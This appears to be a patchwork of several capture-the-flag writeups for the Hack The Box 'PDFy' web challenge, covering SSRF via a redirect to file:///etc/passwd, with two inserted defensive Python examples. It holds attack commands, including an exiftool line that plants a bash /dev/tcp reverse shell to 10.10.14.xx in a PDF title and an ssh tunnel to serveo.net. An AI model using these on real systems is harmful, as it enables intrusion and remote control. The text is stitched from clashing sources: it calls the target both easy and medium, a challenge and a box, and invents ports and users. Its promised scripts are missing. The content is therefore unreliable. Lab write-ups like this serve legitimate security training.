PDFy HTB Writeup (UPD)
PDFy is a retired Web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) to read local files.
Here is a solid, step-by-step walkthrough to master this challenge.

🔍 Challenge Overview
Name: PDFy
Category: Web
Difficulty: Easy
Core Vulnerability: Server-Side Request Forgery (SSRF) triggered via PDF generation.

1. Initial Reconnaissance
When you launch the target instance and navigate to the provided IP address, you will find a simple web application.
The Functionality: The app prompts you to input a URL.
The Behavior: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.
The Goal: Leverage this behavior to trick the server into accessing its own internal files.

2. Identifying the Vulnerability
The application processes a remote resource (the URL you supply) and renders it. This is a textbook environment for SSRF.
If you input a standard website like http://google.com, the app grabs the page and makes a PDF.
If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd), the application will typically have a blacklist filter in place to block it.

3. Exploiting the SSRF (Bypassing the Filter)
To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a Server-Side Redirect hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control.
Step A: Create a malicious PHP redirect script
Save the following code as index.php on your local attacker machine:
This script instructs anyone (or any bot) visiting it to immediately redirect to the local /etc/passwd file of the machine reading it.
Step B: Host the script
Start a local PHP server on your machine on port 80:
sudo php -S 0.0.0.0:80
Step C: Expose your server (if necessary)
If you are playing on a cloud instance and the HTB box cannot route directly to your local IP, use a tool like Serveo to expose your local port 80 to the public internet:
ssh -R 80:localhost:80 serveo.net

4. Capturing the Flag 🚩
Copy the public URL provided by Serveo (or use your direct VPN IP if reachable). Paste this URL into the input field on the PDFy web app.
The app will visit your server, get hit with the Location: file:///etc/passwd header, and proceed to render the target machine's local /etc/passwd file into a PDF.
Open or download the generated PDF. You will find the contents of the file, including the flag.
💡 Pro-Tip: If you ever struggle to find the exact flag location in similar challenges, keep it simple and start by looting files like /etc/passwd or application source code files to find hardcoded environment variables.
Official PDFy Discussion - Page 2 - Challenges - Hack The Box
First Impressions – What Does “UPD” Mean?
The “UPD” tag is critical. Older versions of the PDFy writeup (from 2020–2021) often missed some nuanced vectors or used deprecated tools. The updated version reviewed here (likely late 2024 or early 2025) reflects:
- Changes in HTB’s network environment.
- Newer enumeration techniques (e.g., using feroxbuster over gobuster, modern ffuf usage).
- Clarified privilege escalation paths with actual exploit reasoning.
It’s clear the author revisited the machine to ensure relevance, which is a breath of fresh air compared to outdated walkthroughs that leave you stuck.
Privilege Escalation
The exploited user has limited privileges. However, it is possible to escalate privileges to root.
$ python -c 'import os; os.system("/bin/bash")'
pdfy@pdfy:/$ sudo -l
Matching Defaults entries for pdfy on pdfy:
env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pdfy may run the following commands on pdfy:
(ALL) NOPASSWD: ALL
The sudo privileges allow running any command as root without a password.
$ sudo bash
root@pdfy:/#
Conclusion
The Pdfy box on HTB is a medium-level difficulty box that requires exploitation of a vulnerable PDF upload service to gain access to the system. The system can be fully exploited to gain root access by leveraging command injection, a vulnerable PDF upload service, and weak sudo privileges.
Recommendations
- Validate and sanitize user-uploaded files to prevent command injection attacks.
- Implement proper access controls and limit privileges to prevent lateral movement.
- Regularly update and patch services to prevent exploitation of known vulnerabilities.
HTB: PDFy Machine Writeup (Updated)
If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit.

1. Enumeration: What are we working with?
As always, we start with an Nmap scan to see which ports are open (replace <target-ip> with the instance address):
nmap -sC -sV -oN nmap_report.txt <target-ip>
Results:
Port 22 (SSH): Standard OpenSSH.
Port 80 (HTTP): An Apache web server.
Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources.

2. Identifying the Vulnerability (SSRF)
The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?
If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine.
The Bypass Plan:
- Host a PHP file on your local attacker machine.
- The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd).
- Give the PDFy app the URL of your hosted script.

3. Exploitation: Reading Local Files
Create a file named exploit.php on your machine:
Start a local PHP server:
php -S 0.0.0.0:8000
Now, go back to the PDFy web interface and enter your IP: http://
What happens? The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.
Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn.

4. Pivoting to the User Flag
Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.
By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to:
Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory.

5. Summary & Key Takeaways
The PDFy box highlights why developers must sanitize URL inputs.
Vulnerability: Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.
Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.
Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!
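The two walkthroughs above explain the same weakness from the attacker's side: the app inspects only the URL the user typed, so a redirect from a public host to file:///etc/passwd (or to an internal port such as 15000) is never checked. The following Python example is added here to show the mitigation list from the summary in working code; it is not PDFy's code nor the code of any writeup author, and it assumes the PDF engine is wrapped by a service that validates URLs before rendering. The hostnames, addresses and canned HTTP responses are constructed so the script runs offline; a real deployment would resolve DNS itself, pin the connection to the resolved address, and call the HTTP client with redirect following disabled.

```python
"""Added example (not the challenge's code): SSRF-aware fetching for a
URL-to-PDF service. Assumed design: a Python wrapper validates every URL,
including every redirect hop, before the renderer sees it. Hosts,
addresses and responses below are constructed fixtures."""
import ipaddress
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def naive_blacklist_ok(url):
    """The weak keyword filter the writeups describe: it inspects only the
    URL the user typed, so a public host that 302-redirects to
    file:///etc/passwd passes untouched."""
    lowered = url.lower()
    return not any(bad in lowered for bad in ("file://", "localhost", "127.0.0.1"))


def is_public_address(ip):
    """True only for globally routable unicast addresses; loopback, RFC 1918,
    link-local, documentation and reserved ranges are all rejected."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_url(url, resolver):
    """Allow only http(s) to a public address. `resolver(hostname)` returns
    the address the fetch would connect to; production code uses real DNS
    and then connects to exactly that address (no second lookup)."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("missing host")
    ip = resolver(parts.hostname)
    if not is_public_address(ip):
        raise ValueError(f"host resolves to non-public address {ip}")
    return ip


def fetch_for_pdf(url, transport, resolver):
    """Follow redirects by hand so every hop is validated. `transport(url)`
    returns (status, headers, body) without following redirects itself
    (with the requests library that is allow_redirects=False)."""
    for _ in range(MAX_REDIRECTS + 1):
        validate_url(url, resolver)
        status, headers, body = transport(url)
        if status in REDIRECT_STATUSES:
            # Resolve the Location against the current URL, then loop so the
            # new target gets the same scheme and address checks.
            url = urljoin(url, headers.get("Location", ""))
            continue
        return body
    raise ValueError("too many redirects")


# --- constructed fixtures standing in for DNS and HTTP ---------------------
FAKE_DNS = {
    "attacker.example": "11.22.33.44",  # constructed public address
    "public.example": "55.66.77.88",    # constructed public address
    "localhost": "127.0.0.1",
}
CANNED_RESPONSES = {
    "http://attacker.example/": (302, {"Location": "file:///etc/passwd"}, b""),
    "http://attacker.example/internal": (302, {"Location": "http://127.0.0.1:15000/"}, b""),
    "http://public.example/page": (200, {}, b"<html>hello</html>"),
}


def fake_resolver(host):
    try:
        ipaddress.ip_address(host)  # a literal IP "resolves" to itself
        return host
    except ValueError:
        return FAKE_DNS[host]


def fake_transport(url):
    return CANNED_RESPONSES[url]


def render_request(url):
    """What the hardened service hands back: the body to render, or the
    reason the request was refused."""
    try:
        return ("ok", fetch_for_pdf(url, fake_transport, fake_resolver))
    except ValueError as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    for u in ("http://public.example/page", "http://attacker.example/",
              "http://attacker.example/internal", "file:///etc/passwd"):
        print(u, "| naive filter passes:", naive_blacklist_ok(u), "|", render_request(u))
```

The naive filter accepts both attacker.example URLs; the hardened path blocks the first at the file:// hop and the second when the redirect target resolves to 127.0.0.1. Running the renderer as an unprivileged user with the file:// scheme disabled in the engine remains a necessary second layer, since URL validation alone does not cover other fetch paths the engine may expose.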
For a writeup of the PDFy challenge on Hack The Box (HTB), the primary vulnerability lies in an SSRF (Server-Side Request Forgery) found in the PDF generation process. The application uses the wkhtmltopdf tool, which can be manipulated to interact with internal resources.

Challenge Overview
Target: A web application that converts provided URLs into PDF documents.
Vulnerability: Insecure URL handling during PDF generation.
Goal: Read local files (like /etc/passwd) using the server's internal access.

Step-by-Step Walkthrough
Reconnaissance & Identification
The web interface accepts a URL to convert to PDF. The backend often uses wkhtmltopdf to render the content.
Traditional injection payloads (such as HTML tags) may not be validated directly, but the server must fetch the supplied URL in order to render it.

Foothold: Local File Inclusion (LFI) via SSRF
Since the server fetches and renders the URL, you can use the file:// protocol to point it toward internal system files.
Payload Example: Instead of a web URL, provide file:///etc/passwd to see if the server renders the system's password file into the resulting PDF.
Tip: If the direct file:// protocol is blocked or fails, you can host a simple redirect script on your own server (using Serveo to expose it) that redirects the HTB bot to the local file.

Exploitation & Data Exfiltration
Once you successfully render /etc/passwd, you have confirmed the LFI/SSRF vulnerability.
Use this access to hunt for the flag, typically located in a standard user directory or within the web application's configuration files.

Key Takeaways for Success
Avoid Redirectors with Warnings: Services like ngrok often include browser warnings that can break the automated PDF rendering process. Use cleaner alternatives like Serveo or your own VPS.
Local Testing: If the remote target is behaving unexpectedly, try running wkhtmltopdf locally with various inputs to understand how it handles redirects and local file protocols.
Stay Simple: Many users struggle by overcomplicating the attack with complex reverse proxies. The most straightforward path is often a basic redirect to a file:// URI.
Reverse Shell
Crafted PDF with title:
exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Upload → reverse shell as www-data.
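The post above shows what happens when a PDF's Title metadata reaches a shell command string. The Python example below is added here to illustrate that failure mode from the defender's side and is not the poster's code or the challenge's code: it places the shell-string pattern beside the argv-list form that makes the same title harmless, adds a detection hook for metadata carrying shell syntax, and shows quoting for the case where a legacy shell script cannot be removed. The title value is constructed, and the only command it ever triggers is echo.

```python
"""Added example (not the challenge's or the post's code): handling an
untrusted PDF Title the way a PDF-processing service should, beside the
shell-string sink that lets crafted metadata run commands. The title is a
constructed, harmless stand-in for the payload in the post."""
import re
import shlex
import subprocess
import sys

# Characters that change the meaning of a POSIX shell command line.
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\n]")

INJECTED_TITLE = "test; echo INJECTED"  # constructed: ';' ends echo, then runs a second command


def unsafe_echo_title(title):
    """Vulnerable pattern: interpolate metadata into a command string and run
    it through the shell. Anything after ';' in the title executes."""
    completed = subprocess.run(f"echo {title}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def safe_echo_title(title):
    """Hardened pattern: an argv list and no shell. The title is delivered as
    one argument, so its metacharacters mean nothing to anything."""
    completed = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", title],
        capture_output=True, text=True)
    return completed.stdout


def suspicious_metadata(title):
    """Detection hook: flag titles carrying shell syntax so uploads like the
    one in the post leave a log entry even where the sink is already safe."""
    return bool(SHELL_METACHARS.search(title))


def shell_quoted(title):
    """If a shell is unavoidable (legacy script), quote the value rather than
    trying to strip 'bad' characters from it."""
    return f"echo {shlex.quote(title)}"


if __name__ == "__main__":
    print("unsafe :", repr(unsafe_echo_title(INJECTED_TITLE)))
    print("safe   :", repr(safe_echo_title(INJECTED_TITLE)))
    print("flagged:", suspicious_metadata(INJECTED_TITLE))
    print("quoted :", shell_quoted(INJECTED_TITLE))
```

With the shell-string sink the title produces two lines of output, the second from the injected command; with the argv-list sink the whole title comes back as a single literal string. The detection hook is what turns such an upload into an alert for the service's logs.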
Potential Drawbacks
- Not beginner-friendly – If you haven’t completed at least 5–10 easy HTB machines, some steps (like URL encoding the payload or setting up a listener with rlwrap) will feel rushed.
- Missing alternative paths – PDFy has at least two ways to get user (one via PDF injection, another via a forgotten API endpoint). The writeup only covers the main path. A short “alternative approach” section would enrich it.
- Outdated links – Some referenced GitHub gists for the exploit code are dead (though the author provides inline code, so it’s not crippling).
